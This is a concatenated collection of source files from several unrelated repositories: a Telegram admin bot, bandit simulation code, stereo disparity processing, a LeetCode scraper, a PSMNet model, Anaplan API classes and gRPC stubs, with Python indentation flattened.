def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/promote":
self.promote()
elif res[0] == "/demote":
self.depromote()
elif res[0] == "/pin":
self.pin()
elif res[0] == "/unpin":
self.unpin()
elif res[0] == "/titleset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text = "Error"
try:
self.context.bot.set_chat_title(chat_id=self.chat_id, title=res[1])
text = "Chat name changed to '" + res[1] + "' !"
except Exception as x:
text = str(x)
self.msg.reply_text(text)
elif res[0] == "/descset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text= "Error !"
try:
if self.tag_msg == None:
try:
self.context.bot.set_chat_description(self.chat_id, str(res[1]))
text = 'Chat descirption updated !'
except:pass
else:
try:
self.context.bot.set_chat_description(self.chat_id, self.tag_msg.text)
text = 'Chat descirption updated !'
except:pass
self.context.bot.send_message(
self.chat_id, text=text)
except:
pass
elif res[0] == "/nickset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
text = "Error"
try:
self.update.effective_chat.set_administrator_custom_title(
user_id=self.tag_user_id, custom_title=res[1])
try:
user_name = "for @" + self.tag_user.username
except:
user_name = ""
text = '"' + res[1]+'" set as the custom title ' + user_name
except Exception as x:
text = str(x)
self.msg.reply_text(text)
elif res[0] == "/bioset":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2 and m == 1:
self.msg.reply_text("Admins can't set the group owner's bio")
return
try:
bio = res[1]
except:
self.msg.reply_text("Provide details about the tagged user's role in the group")
return
self.db.add_link(self.chat,self.tag_user,status=None,replace=5,bio=bio)
self.msg.reply_text(self.tag_user["first_name"] +" 's group-bio updated !")
elif res[0] == "/biodel":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.db.add_link(self.chat,self.tag_user,status=None,replace=5,bio=None)
self.msg.reply_text( self.tag_user["first_name"] + " 's group-bio deleted !")
elif res[0] == "/bio":
try:
bio = self.db.get_link(self.chat_id,self.tag_user_id)
if bio[4] == None:
self.msg.reply_text("Bio has not been set for this user in this group !")
return
self.msg.reply_text(str(bio[4]))
except:
self.msg.reply_text("Bio has not been set for this user !")
def edit_router(update,context):
threading.Thread(target=edit_cls(update,context).router, args=(), daemon=True).start()
```
#### File: modules/core/filter.py
```python
import modules.core.database as database
#import modules.core.extract as extract
import modules.core.extract as extract
import modules.core.unparse as unparse
import time
import threading
import json
class filter_switch():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.msg_string = self.msg.text
def lock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
extract.admin_sync(self.update,self.context,db=self.db)
self.db.add_settings(self.chat_id,lock=1)
self.msg.reply_text("Chat Locked !")
def unlock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
#extract.admin_sync(self.update,self.context,self.db)
unparse.unparse_cls(self.update,self.context).sync()
self.db.add_settings(self.chat_id,lock=0)
self.msg.reply_text("Chat Unlocked !")
def filter_remove(self,word,tell=0):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.db.remove_filter(self.chat_id,word)
if tell==1:
if word == '*':
self.msg.reply_text("Cleared filter !")
else:
self.msg.reply_text(word + " removed from filter !")
def filter_add(self,res):
word=None
response=None
delete=0
type=0
try:
ress = res.split(None, 2)
if ress[1] == "reply":
type=1
elif ress[1] == "replydel":
type=1
delete=1
elif ress[1] == "warn":
type=2
elif ress[1] == "warndel":
type=2
delete=1
else:
return
word=ress[0]
response=ress[2]
except:
if type==2:
self.msg.reply_text("Give a response message for warn..")
return
word = res
delete=1 #type=0
chat_id = self.chat_id
filter_list = self.db.get_filter(chat_id)
for i in filter_list:
if word == i[2]:
#database.remove_filter(chat_id,word)
self.filter_remove(word)
break
self.db.add_filter(chat_id=chat_id,word=word,type=type,response=response,delete=delete)
self.msg.reply_text(word + " added to filter !")
def filter_stat(self,res):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
if res == "on":
self.db.add_settings(self.chat_id,filter=1)
self.msg.reply_text("Chat filter active !")
elif res == "off":
self.db.add_settings(self.chat_id,filter=0)
self.msg.reply_text("Chat filter deactivated !")
elif res == "list":
fi_li = self.db.get_filter(self.chat_id)
self.msg.reply_text(fi_li)
#elif res == "stat":
else:
x = 0
for x,y in enumerate(self.db.get_filter(self.chat_id)):
pass
z = self.db.get_settings(self.chat_id)
if z[5] != 0:
z="active"
else:
z="Off"
self.msg.reply_text("Filter currently " + z + " with " + str(x) + " active filters in this chat..")
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/lock":
self.lock()
elif res[0] == "/unlock":
self.unlock()
elif res[0] == "/filter":
try:
self.filter_stat(res[1])
except:
self.filter_stat("stat")
elif res[0] == "/filteradd":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
try:
self.filter_add(res[1])
except:
ex = "Please use this format : \n'/filteradd <word> <filter-type> <reason/reply-text>'\n\n<word> is the text that the bot has to react to\n<filter-type> is the type of filter, it can be any from ( 'warn', 'reply, 'delete', 'warndel', 'replydel' )\n <reason/reply-text> : is the text bot responds with during reply & warn\n\nEx : '/filteradd beep warndel for using profane words'"
self.msg.reply_text(ex)
elif res[0] == "/filterdel":
self.filter_remove(res[1],1)
def filter_router(update,context):
threading.Thread(target=filter_switch(update,context).router, args=(), daemon=True).start()
```
|
{
"source": "jeswan/delayed_feedback_contextual_bandits",
"score": 3
}
|
#### File: src/models/uniform_model.py
```python
import numpy as np
import matplotlib.pyplot as plt
from reward_generators.simple_rewards import SimpleRewardsGenerator
def evaluate(model, n_steps=1000, delta=10, reward_gen=SimpleRewardsGenerator
()):
"""Evaulate the regrets and rewards of a given model based on a given reward
generator
Args:
model (TYPE): Description
n_steps (int, optional): Description
delta (int, optional): Number of steps for feedback delay
reward_gen (TYPE, optional): Description
Returns:
regrets (list): List of regrets for each round. Regret is the maximum
reward minus the selected action's reward for the round
rewards (list): List of rewards for actions taken
"""
regrets = []
rewards = []
last_rewards = []
last_changes = []
for step in range(1, n_steps + 1):
reward_vector, item_changed = reward_gen.get_rewards()
selected_action = model.get_action()
regret = (
np.max(reward_gen.reward_probs) - reward_gen.reward_probs[selected_action]
)
regrets.append(regret)
rewards.append(reward_vector[selected_action])
last_rewards.append(reward_vector[selected_action])
last_changes.append(item_changed)
# Feedback if delta steps have passed
if step % delta == 0:
model.update(last_rewards, last_changes)
last_rewards = []
last_changes = []
return regrets, rewards
class UniformModel:
"""Model that uniformly chooses a random action
"""
def __init__(self, n_items=10):
self.n_items = n_items
def get_action(self):
"""Returns a random item
Returns:
TYPE: Description
"""
return np.random.choice(self.n_items)
def update(self, x, y):
"""Summary
Args:
x (TYPE): Description
y (TYPE): Description
"""
pass
if __name__ == "__main__":
for _ in range(10):
gen = SimpleRewardsGenerator(change_prob=0.5)
print("Reward probabilities before: ", gen.reward_probs)
rewards, change = gen.get_rewards()
print("Rewards: ", rewards)
print("Item changed: ", change)
print("Reward probabilities after: ", gen.reward_probs, "\n")
regrets, rewards = evaluate(UniformModel())
plt.plot(range(len(regrets)), np.cumsum(regrets))
plt.title("Regret")
plt.show()
plt.plot(range(len(rewards)), np.cumsum(rewards))
plt.title("Reward")
plt.show()
```
#### File: src/reward_generators/simple_rewards.py
```python
import numpy as np
class SimpleRewardsGenerator:
"""Generates rewards according to the procedure in Table 1 of "An Empirical Evaluation of
Thompson Sampling" by <NAME> Li.
Attributes:
change_prob (float): The probability one of the items is retired and replaced by a new one
n_items (int): number of items
reward_dist (np.random): The true reward probability of a given item
reward_probs (ndarray or scalar): The true reward probability of each item
"""
def __init__(
self,
n_items=10,
change_prob=1e-3,
reward_dist=lambda x: np.random.default_rng().beta(4.0,
4.0, size=x),
):
self.n_items = n_items
self.change_prob = change_prob
self.reward_dist = reward_dist
self.reward_probs = self.reward_dist(self.n_items)
def get_rewards(self):
"""Get reward array for the simulator
Returns:
ndarray: Reward array with reward for each item
item_changed: item that was replaced
"""
item_changed = None
if np.random.rand() < self.change_prob:
item_to_change = np.random.choice(self.n_items)
self.reward_probs[item_to_change] = self.reward_dist(1)[0]
item_changed = item_to_change
rewards = (np.random.rand(self.n_items) < self.reward_probs) * 1
return rewards, item_changed
```
|
{
"source": "jeswan/endodepth",
"score": 2
}
|
#### File: jeswan/endodepth/generate_disparity.py
```python
import os
import cv2
import argparse
import numpy as np
import itertools
import shutil
from pathlib import Path
from os import listdir
from os.path import isfile, join
import matplotlib.pyplot as plt
import PIL.Image as Image
from concurrent.futures import ThreadPoolExecutor
# GIF
import glob
from PIL import Image
def normalize(image):
return cv2.normalize(src=image, dst=image, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
# TODO: return confidence map
def process_frame_BM_postproc(left, right, name, output_dir, do_blur=True, do_downsample=True, do_plot=False, **kwargs):
numDisparities = kwargs.get('disparity')
kernel_size = 3
left = cv2.GaussianBlur(left, (kernel_size, kernel_size), 1.5)
right = cv2.GaussianBlur(right, (kernel_size, kernel_size), 1.5)
left_matcher = cv2.StereoBM_create(numDisparities=kwargs.get(
'disparity'), blockSize=kwargs.get('blockSize'))
wls_filter = cv2.ximgproc.createDisparityWLSFilter(left_matcher)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
wls_filter.setLambda(kwargs.get('lambdas'))
wls_filter.setSigmaColor(kwargs.get('sigmaColors'))
disparity_left = np.int16(left_matcher.compute(left, right))
disparity_right = np.int16(right_matcher.compute(right, left))
wls_image = wls_filter.filter(disparity_map_left=disparity_left,
left_view=left, right_view=right, disparity_map_right=disparity_right)
wls_image = normalize(wls_image)
wls_image = np.uint8(wls_image)
#crop - https://stackoverflow.com/questions/13538748/crop-black-edges-with-opencv
_,thresh = cv2.threshold(wls_image,1,255,cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:]
cnt = contours[0]
x,y,w,h = cv2.boundingRect(cnt)
crop = wls_image[y:y+h,x:x+w]
cv2.imwrite(os.path.join(output_dir, name + ".png"), crop)
def product_dict(**kwargs):
keys = kwargs.keys()
vals = kwargs.values()
for instance in itertools.product(*vals):
yield dict(zip(keys, instance))
def process_dataset(left_dir, right_dir, output_dir, algo="BM_POST", **kwargs):
left_images = [f for f in listdir(left_dir) if f.endswith('.png')]
right_images = [f for f in listdir(right_dir) if f.endswith('.png')]
assert(len(left_images) == len(right_images))
left_images.sort()
right_images.sort()
executor = ThreadPoolExecutor()
for params in product_dict(**kwargs):
for i in range(len(left_images)):
left_image_path = os.path.join(left_dir, left_images[i])
right_image_path = os.path.join(right_dir, right_images[i])
imgL = cv2.imread(left_image_path, cv2.IMREAD_GRAYSCALE)
imgR = cv2.imread(right_image_path, cv2.IMREAD_GRAYSCALE)
executor.submit(process_frame_BM_postproc, imgL, imgR, left_images[i].split('.')[0], output_dir=output_dir, **params)
# createGifs()
def createGifs(input_dir, output_dir):
# https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html#gif
fp_in = input_dir+'*.png'
fp_out = f"{glob.glob(fp_in)[0].split('.')[0]}.gif"
img, *imgs = [Image.open(f) for f in sorted(glob.glob(fp_in))]
img.save(fp=fp_out, format='GIF', append_images=imgs,
save_all=True, loop=0)
# delete imgs
for filename in os.listdir(fp_in.split('*')[0]):
if filename.endswith(".png"):
file_path = os.path.join(output_dir, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Create disparity maps using StereoBM.')
parser.add_argument("-l", "--left_dir",
dest="left_dir", required=True, help="directory of left daVinci images", metavar="DIR")
parser.add_argument("-r", "--right_dir",
dest="right_dir", required=True, help="directory of right daVinci images", metavar="DIR")
parser.add_argument("-o", "--output_dir",
dest="output_dir", required=True, help="output directory of daVinci disparity maps", metavar="DIR")
args = parser.parse_args()
Path(args.output_dir).mkdir(parents=True, exist_ok=True)
# BM params
NUM_DISPARITIES = [64]
BLOCK_SIZES = [15]
# optional processing
do_downsample = False
do_blur = True
if do_downsample:
NUM_DISPARITIES = [int(x / 2) for x in NUM_DISPARITIES]
# postprocessing params
LAMBDAS = [8000]
SIGMA_COLORS = [0.8]
process_dataset(left_dir=args.left_dir, right_dir=args.right_dir, output_dir=args.output_dir, disparity=NUM_DISPARITIES,
blockSize=BLOCK_SIZES, lambdas=LAMBDAS, sigmaColors=SIGMA_COLORS)
```
|
{
"source": "Jeswang/leetcode-xcode",
"score": 3
}
|
#### File: Jeswang/leetcode-xcode/get-data.py
```python
import os
import bs4
import requests
def createFile(fileName, content):
with open(fileName, 'a') as file:
file.write(content)
file.close()
class BaseHandler:
def __init__(self, soup=None):
self.soup = soup;
class LCProblemHandler(BaseHandler):
def run(self):
problems = self.soup.find_all('tr')
self.problem_names = []
self.problem_dates = []
self.problem_ac_rate = []
self.problem_urls = []
for i in problems:
result = i.find_all('td')
if len(result) > 0:
self.problem_names += result[1].contents[0]
self.problem_urls.append("http://oj.leetcode.com" + result[1].find('a')['href'])
self.problem_dates.append(result[2].contents[0])
self.problem_ac_rate.append(result[3].contents[0][:-1])
class QuestionHandler(BaseHandler):
def run(self):
textarea = self.soup.find("textarea", class_='cpp')
self.cpp = textarea.get_text()
question = self.soup.find(class_='question-content')
self.description = question.get_text()
def generateHeader():
r = requests.get("http://oj.leetcode.com/problems/")
soup = bs4.BeautifulSoup(r.text)
main_handler = LCProblemHandler(soup)
main_handler.run()
for i in range(len(main_handler.problem_urls)):
url = main_handler.problem_urls[i]
r = re.compile(r"""\/([\w-]*)\/$""")
fileName = r.findall(url)[0]+".h"
r = requests.get(url)
soup = bs4.BeautifulSoup(r.text)
handler = QuestionHandler(soup)
handler.run()
print("NO "+ str(i) + " Finished.")
author = """//
// %s
//
// Created by %s %s.
//
""" % (fileName, autherName, date)
comment = ("/*\nDescription:"+ handler.description+"*/").replace('\n\n', '\n')
code = handler.cpp
createFile(fileName, author + "\n" + comment + "\n\n" + code)
if __name__ == "__main__":
generateHeader()
```
|
{
"source": "jeswan/PSMNet",
"score": 2
}
|
#### File: PSMNet/models/stackhourglass.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import math
from .submodule import *
class hourglass(nn.Module):
def __init__(self, inplanes):
super(hourglass, self).__init__()
self.conv1 = nn.Sequential(convbn_3d(inplanes, inplanes*2, kernel_size=3, stride=2, pad=1),
nn.ReLU(inplace=True))
self.conv2 = convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=1, pad=1)
self.conv3 = nn.Sequential(convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=2, pad=1),
nn.ReLU(inplace=True))
self.conv4 = nn.Sequential(convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=1, pad=1),
nn.ReLU(inplace=True))
self.conv5 = nn.Sequential(nn.ConvTranspose3d(inplanes*2, inplanes*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),
nn.BatchNorm3d(inplanes*2)) #+conv2
self.conv6 = nn.Sequential(nn.ConvTranspose3d(inplanes*2, inplanes, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),
nn.BatchNorm3d(inplanes)) #+x
def forward(self, x ,presqu, postsqu):
out = self.conv1(x) #in:1/4 out:1/8
pre = self.conv2(out) #in:1/8 out:1/8
if postsqu is not None:
pre = F.relu(pre + postsqu, inplace=True)
else:
pre = F.relu(pre, inplace=True)
out = self.conv3(pre) #in:1/8 out:1/16
out = self.conv4(out) #in:1/16 out:1/16
if presqu is not None:
post = F.relu(self.conv5(out)+presqu, inplace=True) #in:1/16 out:1/8
else:
post = F.relu(self.conv5(out)+pre, inplace=True)
out = self.conv6(post) #in:1/8 out:1/4
return out, pre, post
class PSMNet(nn.Module):
def __init__(self, maxdisp):
super(PSMNet, self).__init__()
self.maxdisp = maxdisp
self.feature_extraction = feature_extraction()
self.dres0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),
nn.ReLU(inplace=True),
convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True))
self.dres1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
convbn_3d(32, 32, 3, 1, 1))
self.dres2 = hourglass(32)
self.dres3 = hourglass(32)
self.dres4 = hourglass(32)
self.classif1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
self.classif2 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
self.classif3 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.Conv3d):
n = m.kernel_size[0] * m.kernel_size[1]*m.kernel_size[2] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm3d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, left, right):
refimg_fea = self.feature_extraction(left)
targetimg_fea = self.feature_extraction(right)
#matching
cost = Variable(torch.FloatTensor(refimg_fea.size()[0], refimg_fea.size()[1]*2, self.maxdisp//4, refimg_fea.size()[2], refimg_fea.size()[3]).zero_()).cuda()
for i in range(self.maxdisp//4):
if i > 0 :
cost[:, :refimg_fea.size()[1], i, :,i:] = refimg_fea[:,:,:,i:]
cost[:, refimg_fea.size()[1]:, i, :,i:] = targetimg_fea[:,:,:,:-i]
else:
cost[:, :refimg_fea.size()[1], i, :,:] = refimg_fea
cost[:, refimg_fea.size()[1]:, i, :,:] = targetimg_fea
cost = cost.contiguous()
cost0 = self.dres0(cost)
cost0 = self.dres1(cost0) + cost0
out1, pre1, post1 = self.dres2(cost0, None, None)
out1 = out1+cost0
out2, pre2, post2 = self.dres3(out1, pre1, post1)
out2 = out2+cost0
out3, pre3, post3 = self.dres4(out2, pre1, post2)
out3 = out3+cost0
cost1 = self.classif1(out1)
cost2 = self.classif2(out2) + cost1
cost3 = self.classif3(out3) + cost2
if self.training:
cost1 = F.upsample(cost1, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost2 = F.upsample(cost2, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost1 = torch.squeeze(cost1,1)
pred1 = F.softmax(cost1,dim=1)
pred1 = disparityregression(self.maxdisp)(pred1)
cost2 = torch.squeeze(cost2,1)
pred2 = F.softmax(cost2,dim=1)
pred2 = disparityregression(self.maxdisp)(pred2)
cost3 = F.upsample(cost3, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost3 = torch.squeeze(cost3,1)
pred3 = F.softmax(cost3,dim=1)
#For your information: This formulation 'softmax(c)' learned "similarity"
#while 'softmax(-c)' learned 'matching cost' as mentioned in the paper.
#However, 'c' or '-c' do not affect the performance because feature-based cost volume provided flexibility.
pred3 = disparityregression(self.maxdisp)(pred3)
if self.training:
return pred1, pred2, pred3
else:
return pred3
```
|
{
"source": "jeswils-ap/anaplan-api",
"score": 2
}
|
#### File: src/anaplan_api/Model.py
```python
import json
import logging
import requests
from typing import List
from requests.exceptions import HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
def get_models(self) -> List[ModelDetails]:
model_details_list = [ModelDetails]
model_list = {}
url = ''.join([super().get_url(), super().get_id(), "/models"])
authorization = super().get_conn().get_auth().get_auth_token()
get_header = {
"Authorization": authorization,
"Content-Type": "application/json"
}
logger.info(f"Fetching models for {super().get_id()}")
try:
model_list = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error getting models list: {e}", exc_info=True)
raise Exception(f"Error getting model list {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise Exception(f"Error loading model list {e}")
if 'models' in model_list:
models = model_list['models']
logger.info("Finished fetching models.")
for item in models:
model_details_list.append(ModelDetails(item))
return model_details_list
else:
raise AttributeError("Models not found in response.")
```
#### File: src/anaplan_api/User.py
```python
import json
import logging
import requests
from requests.exceptions import HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout
from .AnaplanConnection import AnaplanConnection
from .util.AnaplanVersion import AnaplanVersion
from .UserDetails import UserDetails
logger = logging.getLogger(__name__)
class User:
_url: str = f"https://api.anaplan.com/{AnaplanVersion.major()}/{AnaplanVersion.minor()}/users/"
_conn: AnaplanConnection
_user_id: str
_user_details: UserDetails
def __init__(self, conn: AnaplanConnection, user_id: str = None):
self._conn = conn
self._user_id = user_id
def get_current_user(self):
if self._user_id is None:
url = ''.join([self._url, "me"])
authorization = self._conn.get_auth().get_auth_token()
get_header = {
"Authorization": authorization
}
logger.debug("Fetching user ID.")
try:
logger.debug("Retrieving details of current user.")
user_details = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error fetching user details {e}", exc_info=True)
raise Exception(f"Error fetching user details {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise ValueError(f"Error loading model list {e}")
if 'user' in user_details:
if 'id' in user_details['user']:
self._user_id = user_details['user']['id']
self._user_details = UserDetails(user_details['user'])
else:
raise KeyError("'id' not found in response")
else:
raise KeyError("'user' not found in response")
def get_user_details(self):
if self._user_id is not None:
url = ''.join([self._url, self._user_id])
authorization = self._conn.get_auth().get_auth_token
get_header = {
"Authorization": authorization
}
logger.debug("Fetching user ID.")
try:
logger.debug("Retrieving details of current user.")
user_details = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error fetching user details {e}", exc_info=True)
raise Exception(f"Error fetching user details {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise ValueError(f"Error loading model list {e}")
if 'user' in user_details:
if 'id' in user_details['user']:
self._user_id = user_details['user']['id']
self._user_details = UserDetails(user_details['user'])
else:
raise KeyError("'id' not found in response")
else:
raise KeyError("'user' not found in response")
def get_conn(self) -> AnaplanConnection:
return self._conn
def get_url(self) -> str:
return self._url
def get_id(self) -> str:
return self._user_id
def get_user(self) -> UserDetails:
return self._user_details
def get_models(self):
"""Get list of models for a user"""
def get_workspace(self):
"""Get list of workspaces for a user"""
```
|
{
"source": "jeswils-ap/anaplan_transactional_api",
"score": 3
}
|
#### File: src/anaplan_api/AuthToken.py
```python
from dataclasses import dataclass
@dataclass
class AuthToken(object):
"""
AuthToken object stores Anaplan auth header and expiry time
:param token_value: AnaplanAuthToken value
:type token_value: str
:param token_expiry: Expiry time in epoch
:type token_expiry: float
"""
token_value: str
token_expiry: float
def __init__(self, token_value: str, token_expiry: float):
"""
:param token_value: Hexadecimal API authorization string
:type token_value: str
:param token_expiry: Expiry time of auth token in epoch
:type token_expiry: float
"""
self.token_value = AuthToken._token_convert(token_value)
self.token_expiry = token_expiry
def get_auth_token(self) -> str:
"""Get auth token value
:return: Auth token value
:rtype: str
"""
return self.token_value
def set_auth_token(self, token_value: str):
"""Update auth token value
:param token_value: New token value to set
:type token_value: str
"""
self.token_value = token_value
def get_token_expiry(self) -> float:
"""Get token expiry value
:return: Token expiry time
:rtype: float
"""
return self.token_expiry
def set_token_expiry(self, token_expiry):
"""Update token expiry time
:param token_expiry: New expiry time of auth token in epoch
:type token_expiry: float
"""
self.token_expiry = token_expiry
@staticmethod
def _token_convert(token_value: str) -> str:
"""Ensures provided token value matches expected format
:param token_value: Auth token value
:type token_value: str
:return: Auth token value formatted for request headers
:rtype: str
"""
if not token_value[:7] == "Anaplan":
return ''.join(['AnaplanAuthToken ', token_value])
else:
return token_value
```
#### File: src/anaplan_api/Model.py
```python
import logging
from typing import List
from .AnaplanRequest import AnaplanRequest
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
def get_models_url(self) -> AnaplanRequest:
"""Get list of all Anaplan model for the specified user.
:return: Object containing API request details
:rtype: AnaplanRequest
"""
url = ''.join([super().get_url(), super().get_id(), "/models"])
get_header = {
"Content-Type": "application/json"
}
return AnaplanRequest(url=url, header=get_header)
@staticmethod
def parse_models(model_list: dict) -> List[ModelDetails]:
"""Get list of all Anaplan model for the specified user.
:param model_list: JSON list of models accessible to the current user
:type model_list: dict
:raises AttributeError: No models available for specified user.
:return: Details for all models the user can access.
:rtype: List[ModelDetails]
"""
model_details_list = [ModelDetails]
logger.info(f"Parsing models...")
if 'models' in model_list:
models = model_list['models']
logger.info("Finished parsing models.")
for item in models:
model_details_list.append(ModelDetails(item))
return model_details_list
else:
raise AttributeError("Models not found in response.")
```
#### File: anaplan_api/util/AnaplanVersion.py
```python
class AnaplanVersion:
_api_major_version: int = 2
_api_minor_version: int = 0
@staticmethod
def major():
return AnaplanVersion._api_major_version
@staticmethod
def minor():
return AnaplanVersion._api_minor_version
```
#### File: src/anaplan_api/WorkspaceDetails.py
```python
from distutils.util import strtobool
from dataclasses import dataclass
@dataclass()
class WorkspaceDetails(object):
_model_details: dict
_id: str
_name: str
_active: bool
_allowance: float
_current_size: float
def __init__(self, details: dict):
"""
:param details: JSON workspace details
"""
self._model_details = details
self._id = details['id']
self._name = details['name']
self._active = bool(strtobool(str(details['active']).lower()))
self._allowance = float(details['sizeAllowance']) / (1024 ** 2)
self._current_size = float(details['currentSize']) / (1024 ** 2)
def __str__(self) -> str:
"""
:return: Friendly workspace details
:rtype: str
"""
return f"Workspace name: {self._name}, ID: {self._id}, Model state: {self._active}, " \
f"workspace size: {self._current_size}, workspace allowance: {self._allowance}"
```
|
{
"source": "JESWINKNINAN/AquilaDB",
"score": 2
}
|
#### File: src/proto/faiss_pb2_grpc.py
```python
import grpc
from proto import faiss_pb2 as proto_dot_faiss__pb2
class FaissServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.initFaiss = channel.unary_unary(
'/faiss.FaissService/initFaiss',
request_serializer=proto_dot_faiss__pb2.initFaissRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.initFaissResponse.FromString,
)
self.addVectors = channel.unary_unary(
'/faiss.FaissService/addVectors',
request_serializer=proto_dot_faiss__pb2.addVecRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.addVecResponse.FromString,
)
self.deleteVectors = channel.unary_unary(
'/faiss.FaissService/deleteVectors',
request_serializer=proto_dot_faiss__pb2.deleteVecRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.deleteVecResponse.FromString,
)
self.getNearest = channel.unary_unary(
'/faiss.FaissService/getNearest',
request_serializer=proto_dot_faiss__pb2.getNearestRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.getNearestResponse.FromString,
)
class FaissServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def initFaiss(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def addVectors(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def deleteVectors(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getNearest(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FaissServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'initFaiss': grpc.unary_unary_rpc_method_handler(
servicer.initFaiss,
request_deserializer=proto_dot_faiss__pb2.initFaissRequest.FromString,
response_serializer=proto_dot_faiss__pb2.initFaissResponse.SerializeToString,
),
'addVectors': grpc.unary_unary_rpc_method_handler(
servicer.addVectors,
request_deserializer=proto_dot_faiss__pb2.addVecRequest.FromString,
response_serializer=proto_dot_faiss__pb2.addVecResponse.SerializeToString,
),
'deleteVectors': grpc.unary_unary_rpc_method_handler(
servicer.deleteVectors,
